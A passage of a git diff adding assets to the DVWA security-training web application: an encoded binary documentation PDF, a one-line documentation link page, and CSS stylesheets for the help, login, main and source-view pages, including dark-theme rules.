zN&?2*SvSQe&mMH)J+f8{s>)xa&Nnqb&vSt)5^03m;_G|C< z#ajTpRae;SC1jy=P{o5cTM@~fqjU1Y-;Vf`WF!kXZ|hJor|CgciLF^n7=&yo<5SGs^gdK6;JG*l(j9}au(%&@ZJl6XeHdj@upW!9LV z5#1NsR1{}yOV`Hu)~NnF^v1uk#m@OiRw&`wzQO~`>i5wu_>jCMAu%RvM>~Yjfd<-9 zKkM#hhce6o@C`-j%C{0ik+5dppuNMANqcrC-IU5uMfvywbG zTK)SwHU5{GzTgtZ)P~(Iv%Jso`_lv9G=ITGdR_sL%^<;-w{f-FgeiZ4ESp%n`?PY- zW*0LPds8tl zqb|rc)oIii2A0qP)yol1eQ`1t7&W3KwaD_``!gf?f_x088ulLV+c3BL?Oxkyr z75k$t4sbNsvaj6|=W;UF4}Msu7ahc_T4r^o{I!Xs$0*KG3byxjO=QXFs*LR_kJ4$} z(9%}>W7qWkI~{oT%54VWsChl|H-YvlzOB3jUkvhzHvbOONZi=z1d~JOIA8g?MySu_ zgmC9d>C5Xls1fRs6qa(6@ zHLWe#Zwqf8s}~%+u9G_=EbCGL{enwmDGm;@fAmyz;*1=~bFfvATGaU%_m!L8&SqL> zMge$MqnLnXT0AM!!E3l!PEENU+~_p)KgH6yFok2j4e~JjR6+J-0R0;EQYpt$qa6Zjn?f zWwZ(1Cll%NmCo;x!RT?`qcU|h-j%1uR zN)CAN61X>`Vxf*#i`35O?q^wTZXnV_z5nXYw}WoHA`X&1WW%dhOX5yM?H79%pjPT5 z1lrllgWsFa$@JKmG7Qa#6jeu#=E$L=D&0G^T0ZuoU;;#5U&_J+bu;=5lpi14*Pv+_ z=pLW4W%5m*M$}c$behjjRIL|YfLb;+juS2u=hQ>2Sp{wWgeL5F=;o1|B;HA9o;Sf? zEBQ{HtCp!OZy^OPsEONQq>{Ln)VcS8M4qX6eoncD-E+f|+u>#1W+g&WMauHzSTD#5 z_BMM$S3XF$*IzBDWNV6wrDP*Nb<#n7{aSBhh7;csCU<)q%9!&oF|f6K)Q?GnR#6|t zOm#KO|Gmr6!^3wTQdAIx4BWqQxD>}ii*i>brNaFyZxA;HC1IgIpgJ4;EIs$TyrLrCJ(<}Ml}pyRZw5%i!6 z;ilrH*`~xAa-1FG;A2R=;rKosyibCl%fM^-mgnp0v>RPNe5z%`Gn;e~f1v|HKIC~$ zNJax0G+p6v%xuKug!{GP7)R#yz}XFmAGAL+GD?s2<4k-_fL)la&}PSwniOx{k!N0U zarUI{U8k%KuI6@I;o!BJ<=RC#E|R@Q4XI*ns16p>^%?`3<~Q!+KQ;Ixh5GMmPSn<> zpxX6sk@~w$?NBt_Y6Y`Rh7JYp!8#&Oq;%nM{)Qv_NGZc}c{lrkxn=H>FHL{v#foT6 z@_kYZ`KAxgKt{Z!eL3YuS*EsMppDf;{ip2NI z5H6HUu4~;>b$xUc05h2teV($(Gg-6Y?aKq+Ka+DPj=INs)qFyu*vf6pO5~7Ap3)lO zY3DA?=)70{8 zo-<6w!Y9wi>*r4VB?hIKe0})YCbN>Kxl|62<1 zhLBUei|yu-h>6>ijd6E@1BPLNiX7=e87S-&vLFq0JiDLI=Ekdg4w44kjx2+ud4Mx;y8o4_M&-xH0bG=nANdK8m^`I}pTaL4 zYF@*M$@`y3?{wjtx&miqCn+;5ZBNE(vlZxgQKgT{P5>;<_JRM2*c~HTd)+Mn|1=%H zFoaP%ZCj<;qGk&|whluk$YnQZEJenUuf%f*s<2Sh4HW*!O<@S=Ps zy|91W4H=idG85ByJam0ruWytOI9&FnC1pOjcv!y{YY5Vu_X-gLfb!jVcH+Q|4S@7q z0?z`P#idYPOq+qcE>s%OJ6uh)vn>K}h}ye7{~1uIBVc^<^9_0R65zx`@K&5PpjC*S z{nz^y`VENI!FC|m+VBoY9Pl#bf4ryUUtSD3<v?ci&0h< z|D^2JGb6x_;Ys<(3#pZsp{1Ma`UL21U=x47fS)|YhI(8L|IH>Wj1aMYfj>w8TvU04 z8;jMBn|4X#yDH-}@Q5v>XoxU>{p|wO-??9x|4TTwKJMPf8?L7^&i)uR1=f+dDdS(W z>nLnvPP&A1we#5Efr+&opg^;JYVK1N{qwy_@B$lX;oTn+taJ?jaC3c<$YziaLi%fT zaNv=g;{An#1T8w`cXNF)FBk1_m-km~^F{3vv5f@b%q&NV*VIPF>a~dr1q;sdc03gh z0ggoYJ#IlkF7ac>>ryOsj@&;<-RCoQ(B4kp*;;7%7<9GMzNPGs2gSlK_UyT+6tH1* z>MR?TNg?IHQ!*cN_v*+nTR5gZK*w@R z!_AN!;s@~;x(z@9@{1U-+6bKcHVO&@@U0-?5&YrdRj0x4Ki~YX6@ck{eKB#nj%NR# zf9x$KL7OfFDn%AD7xGBVT|iaw^d0WD%?hy%t@!b|4z5LAqVJ6#s*0F!Wwkg!gXPWO ze#cQ%UDBws^a&oG$J~NR+7C^|0_=S>A=X>045M^6hmsUfy9A|C;1(Bg{8$kjJG(W* zw4FKL<_+CswNt?L1}S55sFBSK!hL3|8W2K;3Pd50w&=L(a%LO?XH27U4P}(gw@=|b zrEzL-_^)9gbZ%irkQN#EO`nw*Hlf6&hm$uCE1f*l0Xyy9#K8@%!j;XjYC)if0{t5r zAOCrObKOWNkfG=G(_h1wGfWN=x1s+`nO-5{UH~W`3CV2rHiP3+=<-He@?ZsHGDkU} zRYzCrvA?bcBxnFX5_ep`fAn@NW~>t1Z^k_<^RJO#ZmuH|bV^#jwftmM?P@m$b+ibb zW)9d_2D8d&mTPS8tEO9B={PVbz5JO>ew2QySqb|A+;5q(-zXnSgZ4s}(S7DMDIe7E zqPW$I=_;xkPvAm*X$j}b%>W{nD0Gd!v$kSBU*(*+bxr=Q*^d(eWX$klXJ7oLSH+Xp zD^>#x+M*G^c+;)@6QwBv7&qXR>fwsejaTPmnT>iJWG_r3O)9+ASz|ZRVFn?jxEHZK zyHr3D<5yod^bocc9KKWCP9TqdGq{Le*;QQZL*tBXv<#UeKYniSKC`^*lvrH)lY8S7 zN0DOJjg*NYBWq$^XiquAU)KrPJg&UOi2x(Jg29RRrQ9a*Pt+{=b%JfzbN6kPMJCCt z5->`KS3Sbn20iZ>sZI`RMC$9lSrPM=`W)E<-%fqNQIcF%G%zSJCijEgd>xB)3~tr@ zGFY=(jJ0fkd%RfOud=DY=^2yAv#6K9H?o_UB1t%dG@HKWcQl}y+~~A1mG@4>s^>5z z;>&h_W#*21$~yjc?JMWcU|T9}+~0UJG8#Uy;NlObA9gABVnQF)s46H|ED}-_sq4ci z25f!QH*Uz?c;R~)X+7~st){|aiZXzp*1?~SMZ_L*9O5w_?%0tTS90=F>vR#HWe{ej z?8cg@vx_lk5blE24fIId@29d{rLn~4gGKgv_Sb%m7rKjWH|oE0bn`&z`18aVk^K|h zJRGZKyY-^h@ef_yXYZ<_^GR(jb5yWL`YScf-q%h52pLeKhtqiM*XO=TrbZ6|aB_<< z0+4e0w7eR(V{%k2w~Dq;wOZBY?sDnzr^M7A7F`GP32AQ2{lHq`Sr*FZTx+kV-;PZG z(OC!OrahqFk93!U*vnc=ygAbw_oU1|qV+)U0-!ct(b_FUBvhbU5Aa{F98w>+UG~IYwQ?go+3Yv8VRSr8N4uO7MD2R{vh)@`#a| zgol4fZG~mY!cFTOu}gg_;6#cPG5LViwv&gKZ^hi*|L4W63NnBtR{5q!@m2lgYhUZ9 zh9b#Wlav6S0qPwf7by1l+;4Qsq|pjufUc}&G*uH;S{K&#IC_*!e-H$V6c|{H)^L|t z5Drru%AQW1>jvOkb}trmqBfdyt?J@!U6()eVR~H~uF5N&>xVSwdn)Fg9J#0kPv&Xr5~iwD(K-mYKPVD7v^wKPZI^TcQ(A=~Yv6 zXp^I$ra*-K4AsW7ZkeJ;8kT{PQ%ml*Ux^aIUM~V1t-HT#`f~4dk8k2T_xFDaLKTM% za+GvAu%tcLt~z16&{%K1bTOxMA{okv5}eCpt(#cmD??`GXbrD?EWK|iAU+`6)gjR@5~(W99zp}0QYHhLTiFcDPvX3e8|^7UwzJg$b0dIH)DiHU-P4;S;9 zOo)!b!&;zBKrH(hnMD!rn!iR2yN%MdpV^mOF4%4GY|wybysL$l$e4-KhRh&0?(L0R zyJ1RVctqEO68lHi!**6V_$?m?x0Brt4jpUDMy&^V9=MtnCLNI+^l-_8nLKtqy&S-2 z?^n76s0LT$QMBPT(bofH8mduerLOL+<*jO|{8e;#(QcmQwedVUD6izS$3pxFbtGUT zT+Wwd0by`JuEH}pISsl1%lR0eMa9DWQ>dFV2v2{#xz%A%a%&aUf#FjQ5po}WJ8_+- zG%x9`VD`BF)hz4eBHe%)1iWGE2*P~E4>=xUQ5|I&>UfX{dqju?J(j8H*hGpSzAD^^e4*x7;#6; z(KzzUPvJrElP$rTQO+thhd zoL3QWsfc@uP*ojSF9ls<5Vx(yCU4isca&qNn!%{x3pa*mk-&*8=n0!h$Lwdjj zbu!7p=R$ZP;#jLI+|OXXAF#UOP97orBk@p045!?5#pAx2@bl&h{>9_!+E;gBx5AUc z7Q-rBcRLs~4t>B&=pdQ86rrxm4Ve9k$d20dNQjy0~6IFK4w zU7J!eSzLOva_?;bASh~iY((UKYP4U+17tyChUWA{Yux!jL zjo4|?Q|2;Y7)Tp5E~wY3*c8%`Q)j0IyybL`;eVq-f?K-JB$V*|G&O&U&tL1?dz;GI z%fB#b*xEzUq`WOCltjp2E)a5&tXj4R1Wh$ee$X&~6$6W)a82ZQ>~6QNRnE#1ke0cD zmJCS@Ef&C`Fi__y1tQjYhe^ZHvxj!JAO(@22@t9FEi_}cvG2DRkw5r=q+bG=t#H%C zI#we6INR7-W&F`?;{hN~rZ)v=Wl@BRw-;)>y;(<=^EjF_9~S@=)wi^L`%@tH4u~zt zinn!mGZd)ig`E^CU!DmG8P@^=pwuHM8Za>+ZjP>gaIh2oVWvzzZp)h~6k2 zMaRz}eq079u{uW@e~PXYw?1M+s&xUg8t}wx?)IE$)dI}3zsxgIHvqBTSS1+}t+pZQ z?vKGAtFa&dI?9Blqes@;@$^9D_)yGE%TaPNWcx7cFBG;0hk~UYaEl%usCplAjc`{T zuGY%`;^Q^n2`4twnVgFjA^!hVW3$ImT$KcQ@l}C?(~JFeZmU7Rr99UbPyy_8KyiM7 zjX<~!C>_nys-m%ubwCj`{CDsH?I*>a)WA?L%7yjw$G`t=nHK~Ha{msG!d!rF0vlz%%D?6lLF zVb4_tFNhM*{#^Q*VB`Ndm&Ct-JNyT{2n845@pw_bt{o6yaRn|)yS#+8+3%V$f})Rq zGFk)&|5=8_Zm)rV!C{yo`~y_65chlf#s5tyH2(iKZDRuq3yVKg^5`N_BX)iNw~~e! zPtPqG|4VOp5T-xLtmfNEaNWc^77U$4NI z*5v>l(na}-r30wnC&_=I*jJ>9f2biIpoSJI2EG=oXUau!#)-}kr1+HAQT`=Gi(~7bQDvzb{2uI>D)X}3?=&!^8u3s5 zR1JOjJ-^`_0_917mgk~8<$X}_GnpY4uw?Mh8KC|B<^MF|KZov9cro68m9hNSd;PPt zj?h1+byo8CR1ODa znXI$gzkHzkKbrafrx}R;!?dT)*T>y-)YQ(-xA&E9)6h77lf9H0k#<`h{OzG~pr)aP ze|n1?V|uJ{+%m!V8lD1pvOjsjJa~cjp4rpWl~++5k2(!#lt6q^?Q)I)wlI6YWcr{rk^OjB6AAKK7EuySoLy=S%&Yb=~|Ufjs(s zAiRGw72g}nHh(x9mrIBH@2Ygrxx2vcANwz_*?-fP-?vp1`8^+VN6*T{-$eN<3mMMW zKl8lu?-t~tdc%dVjDvIY!%shK930<&*Ye*j-M{Vf|9-=mP`9IBXXl~JoGrPWm!h3l zu-&1g`4I%bFTEZvSJ!yRN^L)Lvm^1LEwZZT$=ZqiuZ?@2e(&hh#5ktHwikb>u68Vc z-|%|NqQ>S2P-c}l!C5!8t8ux!2F>v9E#-eoh_%pNFUU`hyi0*BCDW94H1{5S{EJe z6{!~^N7rH+&T5*gC%gP?Y- zuMqw`o52n6I}X+^l5PVEsL6Zbk%^TmHk`?Q{#*|naB-dBBX&wbLr8w-ZavigcquRU zx3VwVZpj;k8Ykpq=@DMF@a|p@HtQ0Niby2)-sWgzc#&3*30qQ;RzTfwTA2^6 z${fe(etcKN9flU;-uG(BOpEDP<0{VV$WIp_Cg=OI9+-uPmsl6|6#*ln#y5E>1`}T2eeg5iJ(anGkvtik^*sSh)0q6Tv#6N9^l{eDkR}s0I~4RsvXh=bzqm zpjaSH_dFYq41LUCq6Oi1jB}!G$+*}GfzP1u}D3CGLqQxc9oO(V!S7=#E zL5zvf1M#QFizWBWe7R@o?DGDa@OBimUoA{gNM-Q0F5xe>94s;Lro%-*^J-$F`F50$ z%y5xbTc%&MMgow$rIc6&$;BrRf+VXbNA)*0QRp4Ym21@K^p+UNe7dKc(U0!3*c;)h z81pPh+KDU@Y4277rcFZI;uLDN-HIwB?m+RGhtjZJb=vA*-h?81rr*$IyF2Hxm}RBW z7bq)(iv|RXwFBhy=KI=cT4ck;DqH!Cf+)@b_&}M7Y>DvuC5wCWQVRpNa~mdya(`=l z>GNy|)`P)vb!b_VbAqo2qLv3l39p;1_rqdIBO>B*GdP`A;jna2m&MT$SB8}~%rc-; zT2GfN)u7V8;mc1%!spb*mK#QukS!zE`Q$2x{su*Z`=(E}+j8o~gVaJ*=l$f@>u&B? zQIof!qH+Uuhp+EAh*{dJh=4$pt8YE+4#)1&oE9SZ=gpS#B5oqLDN|niA?%I~J*xH- zNsi4J`Og`%& zWTY(a%zmZ3eK@9HS6uh|>f@5sY|-Mk1I&{(vJ>@07MpD36e}Cd(L2^WOv_cAmCFmF zfwkj`^tETtZ%~>p!K0J?B_}c!Scyl9zj$V`bF;TBy!13H9yYG(em?JvjI2`$KdEXP z-DYB57+kL}c>j}wr-c2j7Xwf5g>d&7JieJxo6%um2E*tQXa@1{EGC4GxG}Wbu;0>m zs#tyh*{aN|&feNTux3O3#o|43nF(gvydE#RQv$&w(+bKqRH+tvK;7i;bw+X_05!5I zx;p1m9(Sx9c!x=KJ0s~Ci_6jS#Or|ITD{vrpLMi<-F+k?8M1J05+uQUj~&>zp#c?6wio%mN) zvUys&C!T?11_G83D_h!B=zB$K&Ee}AvBn(3i!Is_d%=NK!YK`XK)lGl6Qp%UWaV~9 z+f`RI{>km+XVevL3>;6Sztt-DP6{i53!}dq5A+9Jmek@ISW=Id6N?VFg~^_q}cCJ z!Vs&GBx#eoJ#|j)G}EbM(Ugk6Zn2Pa)pf-Rq`Av=*6^3dDn(lCD!%z(jv0YYks98) zlekbpwhgD>*nO~o^FbA293Kb$Hc@*QG5+K3C39|R;?>~Ogv!&!%7r6sCXK+ghw6T{ z_Q+#L%Wca=P{U8v5Q${L5HE6e9OY{AN~4AMWzXg(RmH`d>)F3P62AFIy!6D%n|){@8kS?nOOm9zvGpq zyY7ht4;bj`svFV$u>=}^^uKOV@4NrYKDL;aM7G{tv+T+i)fP`TblYP9DI<`w4mq#` z#{C}&PNzoZ7aVImDQ!cltydm__#-g->yyVB%u!Sz<;~Dq*Qx1gFsd@R^z>Lfv0Y?4 zs0;MP>6R?h$u`*O(t*64g9Fn!0I4s_Ndww7YfwGDP-c8BcXt;sUkNG%545XIW>Q8N z_bv(VFRi5$vBZ!g)^e$#G~sd_v2wQ@^?Yg|FBZC`=LwThrAEWJmYeC;xQff|E)Zl> z>03voON8#BG{NfjC$A6r-V_?sGI?SIGhUH};0^Xi-UZiq_-8g{slU1HENYjunhjkq z03Wq_L~8NiC#6eJ^D`Q)zwH=SwZj(-V13#CB}&GHMVUzjvBqpUS<|}E2f`z)nd8hx z-4E1#n1i`}oFkGPf8yWx1S~C85l^d$7jbrG%Q6we3~^XItdJho&mHWgjgQc`8)SnV ziB zzVLUt-JVKPHFe`^(hv+zjK~?@q^lY$|WmeEkV@u`N6`=;7`PPwY655#p*l+ z7d>F3kd+nOjL%pKOPsfg$`zsLJsM`SXxbieC`6i(3Z0&uFO8P?Y9ZI;2?P=5fvkPe+~Zc?)q$pEsP;aSLRjZ@sgZws)xvES93jq z&(14a-X4TMwT^|1Bp>CZNkw8T``=0gyQ+Z>C6280Eu3wQ@G6Kl`Ys0;<>1MUU2imB zxnfGo=B^bkCBf)wkR#|X*8@BIEUKM3!DMMP^2wOtsTj4_bV$pjescQVkTcC1@uQW* zvWf1N`z|YE8S(s1%bBJfI;h-OgpMwR7^6F=DNc7g|4e^pDDZ-(y zWMCQTRsCXt5noO?ovOdgr7}w4VSY=Wlgz0kvz~QqT@8Yk z%pX%jVNkpWC2MbUI+H{SOaj*DX}p#PR9F&qBh>6At9C=$2J4EU zu4=3Mi!#vM;|Jh|I>Wt}K{%k62Q}ZJu_^rtFAw!+C__e?JNeTNi;ebr+be){n7k!c z4hfkx1lq!rJ~Z+k?CQmtB5sF`JG;geMlq6C-&B?#$w76lgZqQ13D;KDv#EO67!_1} z$7vk;`w#eBH`8!Mcn^a=^}ybd&yT1U8GB?#auPA37+c6vE~#XiH(Rn8=PNfnBq~-A zQgo-=we;wpP%9!EgAEttSFY8{B*$p(lo)|Z24F)0Ol}k8=~>iQ=9af^4CCW#OnNmb z_9<*mrtt0FTU##+>V`$v6HYzWw7tCyv+p^sud8&k{Rqh`{$^JKGXo!HeLPdLi5s!f zKHSewG~}|&IOS(TlVh(Ec^j3<2T{ut3BwuG^Ba8M%UZE9j0jjnUN--! zPn{2qhkGpIX{=mjjYdl8*>Sy0svdDrhIAG5EZy_UwJ7V|?e&!Fl=)vbC!8QXnoL zNkwRcAMW9YHhr`AaLV2(^3K}3elB;auVcj`u$Uq0LA2TvfiDe#P<7J`J}U2 z+$)lh?|&Br)*e@_)MVFlANsvWTqDRaxSi~-R@WtaCCN+fo!MF5P+?f$xH4?&BOBu@ zs8(>_`)%^bnl+1KdgEnFZrhz_r!RHSuOun$QED%Jt=6 zsjl*1fx!VXTpS<$JxvU@-iEA7LQ8`z_-r>x(kSww!)^(#u7g_%i_3Hx*@hoBz6s7F zFsQeK+>p$KUbDKDgwtiYj25`SgGan6-kg*a_drb zK={oRgFmh1Qx0_XZLDPZRKIHad)#IAG3_aW>hCvE721^6I_X2(CXZWQ2UixXbPueq z&ktoRZifUG>qAcXSw0f4J6{%3t@Jp<6SbYF(%Ur45k(PfpwwM;d>r)$rDi1^^Q-Fx zUkX|CWx&b_`As94uRj3qdYT>XQ@9WFT-jK9vObx)&w)n+$ti930O8%M4JF8#!ZFLJ zJI_&OhH{(vs(VDyCsT;Gw)JodGmJ*(Q!-oaygish9C@6g(svow^}JIn2tQ>JqO}XH z9E-`C^P*`@qe`4Ws!S3LEOhFfX))Oy#4?-~Y2XYfG}LIO?qi5rn(Dmr^szcx9ogKE z*{xf*yS>$+u1?WiAs9175XXKp{8C3a(y$}dwam-avRb%wum63)yGr+rL zm(*d}SGH`iGKO~Irs!)e&a0JIM3k6IVrYH7R=$3cFM7I~q|ZZi+&5bhc*?J-pUD61 z<=A93)w(BE9;zWA;?y`*fH9>DzS-^drkH4*toyDE^EW%}9C`^?YM zgSkj#-jm!!EPKFSq<~2rg%8TR?o^V|&sI^@T-N2VuMZyxWm+|{~AsZ?0_RPpQ#8W3olz3Vd-T|3bCfLtHL zsZ!Wb>nu5*vA6(2-MV<>c;e-*I!tZ7cEER3NlC6_zP>n|EY#u4?HCiS9NnQ_3LBB1 zurH(tPgb6^`xr=GB}PB$2l>7mVxg>FMAUzzS>kv*<5VMcAHR3tAAEa`^B0GX;VrRHE3Im^K`ECtSKh)1JeFGZwhCjyDK8`It zdD60vzcS6@;@V{1;z1~-wRt<*(GtEl($Nx&TLt;>-3k+J(j}PDjBNEGG4UZ7sLE^4 zy9PFOZy>wk*_9V=CeO4~N|Jp^C@^9#VOIaW<@}`A7eNkn^L<(oo8c@YddXEF)qDnH zy$!^WMNUU3!HVk943g;3(QT`9y1Ad0DLI(UvYJ0XV!Nqx%SG@xeH%~a zV)n}kTT9w(uKu03Hc=Tv{o~+HE;W+apP`TFzLcKLBJWqNoVS%KjuKc?8=Im%#>a}FW8IC^ZMY* z7g-&M&y$N#$ZQg!rPsrugS&~}Q{mFZPx2>1PX8BAbJ?Io+$F1YR;XTDvtrls5lWee?w zFJm$MrBR5G$&nl*a)BI=VLC_}hTJN3Jsu;B0`sR}#vyP^9K1ib6gTOP!8zyd zLwF%OJFXQg1B34HglOQ>I&HC5vsZsmVB*g8V{Y|juazXZ<ef@1kKr|8bl z2)igfu8bM;sXPL4xY?__h4h{yHu+$01~*8!xSpFLUxu7rvh9*7Fa>Z&I+6(yr*3r- za+xyv$NQeyR}0RN3i~kDzcDw#Mx9P*SKUkdU?G(}L z6Jo=+gVdy<==4Mxp+U`eR}k$Crt;mNBksk9WP#lh1H|~3gp}Aik_`18fZ}idBxli6MsReMsp?L3e`G@xvZd(B-?HC zxkds{s*RpkiD{7Q>k4sB%tI9Wm;j{E{GW6$b>NNfV7+yK%X0dp%RoH8v|Tr2JY(PR zjPnws`}wApW~uAe09yojBOA1B$CU!su3EI%mQo+TUo0o9-uNWfB`_*#B6^Q-w?ueU z(I`5QFP8>3-$O*Jpg2_X z1QyrQ>=pw}j>hwZEJe`x%IaOL8gnnoi?p6qJ?Sk#UMg>6Ge2;V;>)L372R%ZLnuyQHh1LK|Lq2YzT z9w~kwON zl_{UKP?{jMP%k*LQ&L{CE=%W3*DN9U@7g1kdwaZtXUjk+v8{(SO@($%Ye zMIeqAn!a1Yo;>mL&^JZHZ#d#RY^^GD2M}8iidO)=eDthLPl>_zGex_2Hn>^7-k&pTBMDamrqDA5pvT~=!k2> z?7DDUfYt982eBrUwK`5$%Vp9XRm|nqkncJ`TVQy!W+t|_QGm_ruvny}1*KcMOABqG zQBf&ojYvS28L&jDa5^2YT0SraTCKZ(>?9=9C?3$u7*rb3Q=tcbKWzR*RGiC^G*A2+ z5$*NCv3}_(AB5u>KRal#>pa(Pv2$6+rm!=C0g3`6MY=%1c+c^t8aEv+ SC&3p;UmyvE7x`kZef}TvTBGLx literal 0 HcmV?d00001 diff --git a/DVWA/docs/pdf.html b/DVWA/docs/pdf.html new file mode 100644 index 00000000..43eb3a77 --- /dev/null +++ b/DVWA/docs/pdf.html @@ -0,0 +1 @@ +Damn Vulnerable Web Application (DVWA) Official Documentation PDF v1.3 diff --git a/DVWA/dvwa/css/help.css b/DVWA/dvwa/css/help.css new file mode 100644 index 00000000..aaf04c9e --- /dev/null +++ b/DVWA/dvwa/css/help.css @@ -0,0 +1,45 @@ +body { + background-color: #e7e7e7; + font-family: Arial, Helvetica, sans-serif; + font-size: 13px; +} + +h1 { + font-size: 25px; +} + +div#container { +} + +div#code { + background-color: #ffffff; +} + +div#area { + margin-left: 30px; +} + +span.spoiler { + background-color: black; + color: black; +} + +/* === Dark theme === */ +body.dark { + background: #2f2f2f; + color: #f8fafa; +} + +body.dark a { + color: #99cc33; +} + +body.dark div#code { + background-color: #2f2f2f; + color: #f8fafa; +} + +body.dark table { + background-color: #2f2f2f; + border: none !important; +} \ No newline at end of file diff --git a/DVWA/dvwa/css/login.css b/DVWA/dvwa/css/login.css new file mode 100644 index 00000000..4e397327 --- /dev/null +++ b/DVWA/dvwa/css/login.css @@ -0,0 +1,59 @@ +body { + background: #fefffe; + font: 12px/15px Arial, Helvetica, sans-serif; + line-height: 20px; + color: #6b6b6b; +} + +#wrapper { + text-align: center; + margin: 0 auto; +} + +#content { + display: inline-block; + padding: 20px; + width: auto; +} + +#footer { + position: absolute; + width: 100%; + height: 50px; + bottom: 0px; + left: 0px; +} + +label { + float: left; + text-align: right; + margin-right: 0.5em; + display: block; + overflow: hidden; + padding-right: 50px; + font-weight: bold; +} + +.loginInput { + float: left; + color: #6B6B6B; + width: 320px; + background-color: #F4F4F4; + border: 1px; + border-style: solid; + border-color: #c4c4c4; + padding: 6px; + margin-bottom: 12px; +} + +fieldset { + width: 350px; + padding: 10px 20px 10px 20px; + overflow: hidden; + border-style: none; +} + +p { + font-size: 10px; +} + diff --git a/DVWA/dvwa/css/main.css b/DVWA/dvwa/css/main.css new file mode 100644 index 00000000..83b45091 --- /dev/null +++ b/DVWA/dvwa/css/main.css @@ -0,0 +1,335 @@ +body { + margin: 0; + color: #2f2f2f; + font: 12px/15px Arial, Helvetica, sans-serif; + min-width: 981px; + height: 100%; + position: relative; +} + +body.home { + background: #e7e7e7; +} + +div.clear { + clear: both; +} + +a { + color: #99cc33; + text-decoration: underline; + font-weight: bold; +} + +a img { + border: 0; +} + +a: hover { + text-decoration: none; +} + +input, textarea, select { + font: 100% arial,sans-serif; + vertical-align: middle; +} + +form,fieldset { + margin: 0; + padding: 0; + border-style: none; +} + +em { + font-weight: bold; + font-style: normal; +} + +h1, h2, h3, h4, h5, h6 { + margin-top: 0px; +} + +h1 { + font-size: 200%; +} + +h2 { + font-size: 160%; +} + + +h3 { + font-size: 130%; +} + +hr { + border-width: 0px; + color: #C3D9FF; + background-color: #C3D9FF; + height: 1px; +} + +ul.menuBlocks { + list-style-type: none; + padding-left: 0px; + margin-top: 0px; + margin-bottom: 0px; + margin-left: 0px; +} + +ul + ul, ul + ul.menuBlocks, ul + h1, ul + h2, ul + p { + margin-top: 20px; +} + +.fixed { + font-family: Fixed, Courier, monospace; + font-size: 13px; +} + +div.nearly { + border: 2px solid #0000ff; + padding: 10px 20px 10px 20px; + margin-top: 15px; + margin-bottom: 15px; +} + +div.success { + border: 2px solid #00ff00; + padding: 10px 20px 10px 20px; + text-align: center; + font-weight: bold; + margin-top: 15px; + margin-bottom: 15px; +} + +div.warning { + border: 2px solid #ff0000; + padding: 10px 20px 10px 20px; + color: #800000; + margin-top: 15px; + margin-bottom: 15px; +} + +div.warning h1 { + color: #ff0000; +} + +div.message { + border: 1px solid #C0C0C0; + padding: 5px; + margin: 10px 0px 10px 0px; + background-color: #f8fafa; + width: 45%; +} + +div#container { + width: 900px; + height: 100%; + margin-left: auto; + margin-right: auto; + background: #f4f4f4; + font-size: 13px; +} + +div#header { + position: relative; + padding: 10px; + overflow: hidden; + background: #2f2f2f; + border-bottom: 5px solid #A1CC33; + text-align: center; +} + +div#system_info { + padding: 10px; + text-align: right; +} + +div#main_body { + float: right; + width: 693px; + background: #f4f4f4; + padding-top: 20px; + padding-bottom: 10px; + font-size: 13px; +} + +div.body_padded { + padding-left: 20px; + padding-right: 20px; +} + +div#main_menu { + float: left; + width: 200px; + height: 100%; + background-color: #f4f4f4; + padding-top: 10px; + padding-bottom: 10px; +} + +div#main_menu li { + border-width: 1px; + border-style: solid; + border-color: #D2D4D4 #6B778C #6B778C #D2D4D4; + padding: 3px 5px 3px 5px; + margin-bottom: 3px; + background-color: #bebebe; +} + +div#main_menu li a { + color: #000000; + text-decoration: none; + display: block; +} + +div#main_menu li:hover { + background-color: #ccc; +} + + +div#main_menu li.selected { + border-color: #758DAE #758DAE #758DAE #758DAE; + background-color: #99cc33; +} + +div#main_menu li.selected a { + color: #F9F7ED; +} + +div#main_menu li: hover { + border-color: #D2D4D4; +} + +div#main_menu li: hover a { + color: #F9F7ED; +} + +div#main_menu_padded { + padding: 15px; +} + +div#footer { + color: #999999; + background: #2f2f2f; + padding: 10px; + text-align: center; + border-top: 5px solid #A1CC33; +} + +.popup_button { + border-width: 1px; + border-style: solid; + border-color: #D2D4D4 #6B778C #6B778C #D2D4D4; + padding: 3px 5px; + margin-bottom: 3px; + background-color: #bebebe; + font-weight: bold; + float: right; + cursor: pointer; + color: #000000; +} + +.popup_button:hover { + color: white; + background-color: #A1CC33; +} + + + + +div.vulnerable_code_area { + background-color: #f8fafa; + border-width: 1px; + border-style: solid; + border-color: #000000; + padding: 10px 20px 10px 20px; + margin-bottom: 20px; +} + +div#guestbook_comments { + width: 45%; + background-color: #f8fafa; + border-width: 1px; + border-style: solid; + border-color: #C0C0C0; + padding: 5px 10px 5px 10px; + margin-bottom: 5px; +} + +div#idslog { + border: 1px solid #C0C0C0; + padding: 5px; + margin: 10px 0px 10px 0px; + background-color: #f8fafa; +} + +pre { + color: red; +} + +div.submenu { + border-bottom: 1px solid #000000; + margin-bottom: 15px; + padding: 4px 0px 10px 0px; + font-size: 13px; +} + +span.submenu_item { + padding: 0px 10px 0px 10px; +} + +span.submenu_item + span.submenu_item { + border-left: 1px dashed #000000; + font-size: 13px; +} + +span.selected { + font-weight: bold; +} + +span.success { + + color:green; +} + +span.failure { + color:red; + font-weight: bold; +} + +.theme-icon { + position: absolute; + right: 0; +} + +.theme-icon img { + height: 32px; + width: 32px; +} + + +/* === Dark theme === */ +body.home.dark { + background: #2f2f2f; + color: #f8fafa; +} + +body.home.dark #container, +body.home.dark #main_menu, +body.home.dark #main_body, +body.home.dark #system_info { + background: #2f2f2f; +} + +body.home.dark .vulnerable_code_area { + background: #2f2f2f; +} + +body.home.dark .message { + background-color: #2f2f2f; +} + +body.home.dark div#guestbook_comments { + background-color: #2f2f2f; +} \ No newline at end of file diff --git a/DVWA/dvwa/css/source.css b/DVWA/dvwa/css/source.css new file mode 100644 index 00000000..58fa5a1c --- /dev/null +++ b/DVWA/dvwa/css/source.css @@ -0,0 +1,47 @@ +body { + background-color: #e7e7e7; + font-family: Arial, Helvetica, sans-serif; + font-size: 13px; +} + +h1 { + font-size: 25px; +} + +div#container { +} + +div#code { + background-color: #ffffff; +} + +div#area { + margin-left: 30px; +} + +.loginSuccess { + color: #638323; +} + +.loginFail { + color: #a50a0a; +} + +/* === Dark theme === */ +body.dark { + background: #2f2f2f; + color: #f8fafa; +} + +body.dark a { + color: #99cc33; +} + +body.dark div#code { + background-color: #bdbdbd; +} + +body.dark table { + background-color: #2f2f2f; + border: none !important; +} \ No newline at end of file diff --git a/DVWA/dvwa/images/dollar.png b/DVWA/dvwa/images/dollar.png new file mode 100644 index 